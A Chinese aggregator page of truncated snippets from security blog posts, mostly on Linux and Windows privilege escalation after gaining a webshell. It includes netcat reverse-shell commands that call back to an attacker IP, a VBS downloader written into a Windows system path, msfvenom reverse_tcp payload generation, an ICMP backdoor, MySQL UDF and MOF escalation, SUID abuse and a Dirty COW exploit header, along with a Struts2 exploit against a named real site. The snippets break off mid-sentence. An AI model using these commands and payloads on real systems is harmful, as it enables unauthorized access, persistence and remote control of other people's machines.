LINUX下使用NC反弹CMDSHELL提权】的更多相关文章

很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核 2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统! 找个外网IP 监听12666,当然12666也可以改.我这里用NC监听nc -l -n -v -p 12666 然后再点你shell 连接成功就出现下面的内容 然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通…
Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去 2:然后本地执行nc -vv -lp 52进行反弹 3:在shell命令下执行F:\wwwroot\img\nc.exe  -e cmd上传路径  IP(外网IP)  52(这…
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法.       实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash…
搜索的时候无意中看见的这款基于ping的ICMP后门.于是到作者的github上看看,居然是阴文的,为了过级,只能强忍着看了,学生狗伤不起.还好比较简单易懂,正如简介说的一样:“PRISM is an user space stealth reverse shell backdoor, written in pure C.” 项目地址:https://github.com/andreafabrizi/prism PRISM只有两个主文件,配置简单,能在Linux.Solaris.AIX.BSD/…
最近碰到一个项目,前端用apache htttpd进行发布(80端口),通过双机负载均衡转发到后端的两个tomcat进行处理(8081和8082端口),现在需要随时监控这三个端口的情况,一旦down掉需要能够立即告警处理.批量的系统监控比较好的是用nagios软件来实现,这样小项目专门装一个nagios软件,有点繁琐了.在网上查了一些资料,总结实验了一下,可以用简单的nc命令来实现. 一.nc命令检测端口的用法 # nc -v -w 10 %IP% -z %PORT% -v 显示指令执行过程.…
 1.Linux基本防护措施 与用户相关的配置文件 /etc/passwd   /etc/shadow  /etc/group /etc/gshadow  /etc/login.defs /etc/skel   与用户相关的命令  chage   passwd   伪装登录提示 /etc/issue. /etc/issue.net   文件系统安全 普通权限 r w x   特殊权限 suid sgid 粘滞位 访问控制列表  facl   给文件加特殊属性  i 和 a   对应的管理命令 l…
之前写过了windows提权小结,这下一篇水什么就有了嘛,于是有了这篇水文,整理一下Linux提权 前篇windows提权小结 ,链接送上 https://www.cnblogs.com/lcxblogs/p/14163338.html  0x00 前言 同windows提权的目的,也是从普通用户权限提升到管理员权限,以便实现读写敏感文件.横向移动进一步控制.执行一些需要权限的命令之类的要求 仍然是思路总结性质的文章,具体操作不展开介绍 具体如何做,应该注意哪些细节,请参考网上其他师傅们的复现操…
Unix/Linux提权漏洞快速检测工具unix-privesc-check   unix-privesc-check是Kali Linux自带的一款提权漏洞检测工具.它是一个Shell文件,可以检测所在系统的错误配置,以发现可以用于提权的漏洞.该工具适用于安全审计.渗透测试和系统维护等场景.它可以检测与权限相关的各类文件的读写权限,如认证相关文件.重要配置文件.交换区文件.cron job文件.设备文件.其他用户的家目录.正在执行的文件等等.如果发现可以利用的漏洞,就会给出提示warning.…
提权管理方案背景: 如果一个公司有10余个运维或网络安全人员,同时管理服务器,切换到管理员用户时(su - root),必须要有root管理员密码,如果其中一人修改过root密码,其他用户则登录不了,那么要找回丢失的密码,要么就是系统重启,要么就是进入单用户模式进行重新配置密码,造成大量的数据无法访问,带来经济损失,为避免出现此种情况导致工作效率低下,我们允许有少量的非root用户依然有root用户的编辑及管理权限(某个用户在执行某个命令的时候,拥有root的最高权限),但用户还是非root用户…
vbs 下载者: 01 1: 02   03 echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs 04   05 echo sGet.Mode = 3 >>c:\windows\cftmon.vbs 06   07 echo sGet.Type = 1 >>c:\windows\cftmon.vbs 08   09 echo sGet.Open() >>…
一,利用MOF提权 Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件. 方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方法. 方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件. Microsoft 建议您到存储库编译 MOF 文件使用前两种方法.也就是运行 Mofc…
  0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口…
目录: 1. 寻找IP 2.dirb目录爆破 2.PHPMailer漏洞反弹得到shell 3.python版本的exp修改 4.查看wordpress的wp-config.php配置文件得到数据库账号和密码 5.使用LinEnum.sh对linux进行信息收集 6.mysqlUDF提权,kali对EXP的编译 7.给程序chmod u+s 增加suid权限,可以以root来运行 8.利用带有suid标志的find命令进行命令执行拿到root权限 0x01 寻找IP 安装好了我们的靶机,当然我们…
vulnhub|渗透测试lampiao 题记 最近在打靶机,发现了一个挺有意思的靶机,这里想跟大家分享一下. 环境准备 vulnhub最近出的一台靶机 靶机(https://www.vulnhub.com/entry/lampiao-1,249/)Lampiao.zip (Size: 669 MB) Download: https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM (https://mega.nz/#…
利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一.实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/library/security/ms11-080 1.通过searchsploit命令查找漏洞 [注:查找漏洞的命令行窗口要能完全显示Title和Path] #有python和ruby两种漏洞利用代码,可根据自己喜好选择,本章选择python 2.通过Sandi查找 查看漏洞利用代码的描述 #通过Afd.sy…
目录 UDF是什么 命令执行 文本写入 Example: 远程写入 反弹Shell 提权 UDF是什么 参考:https://www.cnblogs.com/litlife/p/9030673.html UDF = 'user defined function',即用户自定义函数. 通过添加新函数,对MySQL的功能进行扩充,就类似使用本地函数如abs() 或 concat() 一样. UDF在mysql5.1以后的版本中,存在于'mysql/lib/plugin'目录下,文件后缀为.dll 或…
公司写部署手册需要,现总结一些linux下postgresql的安装及数据库创建的详细步骤吧! 1.1.1  软件安装   1.设置用户组和用户级别 Postgresql不能以root身份运行,要以其他的身份运行,所以必须建立对应的用户和组. (1)新增postgresql用户组:groupadd postgresql (2)新增postgres用户属于postgresql用户组:useradd -g postgresql postgres (3)修改postgres用户密码:passwd po…
[root@localhost ~]# cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) 修复命令: 使用root账号登陆Shell,键入以下代码回车:            Centos/RedHat: yum update -y            Ubuntu:apt-get update -y      命令完成需重启系统:reboot 验证修复: 登陆阿里云云中心管理控制台,逐个验证修复即可. RHSA-2017…
目录 UDF UDF提权步骤 UDF提权复现(php环境) UDF UDF (user defined function),即用户自定义函数.是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等. 那么,我们该如何使用UDF呢? 假设我的UDF文件名为 udf.dll,存放在MySQL安装目录的 lib/plugin 目录下.在 udf.dll 文件中,我定义了名为 sys_eval 的mysql函数,该函数可以执行系统任意命令.…
Linux下的漏洞提权 linux下一般都是系统漏洞提权,分为以下几个步骤:…
有些新手朋友在拿到一个webshell后如果看到服务器是Linux或Unix操作系统的就直接放弃提权,认为Linux或Unix下的提权很难,不是大家能做的,其实Linux下的提权并没有很多人想象的那么难,你真去尝试做了,也许你就会发现Linux下的提权并不难,尤其是一些简单的提权方法是很容易学会的.Linux下的提权我知道的比较简单的方法都是在命令行下完成的,很多新手叉子可能根本没接触过Linux下的一些常用命令,今天危险漫步就给大家介绍一些Linux下提权过程中常用到的Linux命令,由于我也…
内网渗透在攻击层面,其实更趋向于社工和常规漏洞检测的结合,为了了解网内防护措施的设置是通过一步步的刺探和经验积累,有时判断出错,也能进入误 区.但是如果能在网内进行嗅探,则能事半功倍,处于一个对网内设置完全透明的状态.本文将从一个注点引发的突破,到控制整个内网的全过程来跟大家讨论,内 网的渗透嗅探术和安全防护一些内容. 在寻找突破时,更多的是从应用服务来,而应用服务最直观的信息采集,就是端口扫描,不同的应用,开放的服务不一样.所以,在对网络进行信息收集时, 大概分为这样两步: 端口探测,程序指纹…
关于SUID详细:Linux下的用户.组和权限 SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了. 已知的可用来提权的linux可行性的文件列表如下: nmap vim find bash more less nano cp 以下命令可以发现系统上运行的所有SUID可执行文件. #以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试…
前言. 提权这么久了  还是头一次提下Linux的服务器... 由于之前一直钻研的win服务器  要不是前些日子爆出来Struts2-045漏洞 估计还没时间接触Linux提权.... 正文. st2漏洞页面 http://www.dainar.com/index.action 可以看到是root权限的 接着就是想办法添加一个root组的用户 由于添加用户需要两次重复输入密码(不像win服务器直接net user) 所以nc反弹一个shell到外网服务器上 nc -vv -l -p 2333 在…
在拿到一个 webshell 之后,大家首先会想到去把自己的权限提升到最高,windows 我们会提升到 SYSTEM 权限,而 Linux 我们会提升到 root 权限,拿在进行 Linux 提权的时候我们要进行哪些操作呢?需要了解哪些信息?使用什么样的命令?这些就是本文的重点. 关于Linux权限提升,有下面几个步骤: 信息收集:尽量收集更多的关于系统的信息. 数据分析:通过把收集到的数据以及信息进行分析,提取其中对我们提升权限有用的信息备用. 搜索:要知道我们需要搜索什么以及去哪里找对应的…
目录 1.suid提权 2.rbash绕过 3.git提权 4.Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation 5.sudoer配置文件错误提权 1.suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的: find / -perm -u=s -type f 2>/dev/null f…
常见的linux提权 内核漏洞提权 查看发行版 cat /etc/issue cat /etc/*-release 查看内核版本 uname -a 查看已经安装的程序 dpkg -l rpm -qa 通过一些现有的exp,上传到目标主机,执行exp,直接获取root权限 github地址https://github.com/SecWiki/linux-kernel-exploits 明文root密码权限 大多数linux系统的密码都和/etc/passwd和/etc/shadow这两个配置文件息…
英文原文: Basic Linux Privilege Escalation 在开始之前,我想指出 - 我不是专家. 据我所知,在这个巨大的领域没有一个“魔法”的答案. 这只是我的发现,写出来,共享而已(是我的起点). 下面列举的项中会出现几个不同命令,都是做同样的事,在不同的场景使用可能会有不一样的亮点.我知道有更多的东西有待探索, 这只是一个基本和粗略的指导. 并不是每个命令都适用于每个系统,因为Linux版本之间有很大的不同. "It" will not jump off the…
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: 001 /etc/passwd 002   003 /etc/shadow 004   005 /etc/fstab 006   007 /etc/host.conf 008   009 /etc/motd 010   011 /etc/ld.so.conf 012   013 /var/www/htdocs/index.php 014…
当前路径: /var/www 磁盘列表: / 系统信息: Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 当前用户: www-data 执行exp c 文件  影响版本低于3.9的linux内核 // // This exploit uses the pokemon exploit of the dirtycow vulnerability // as a base and automa…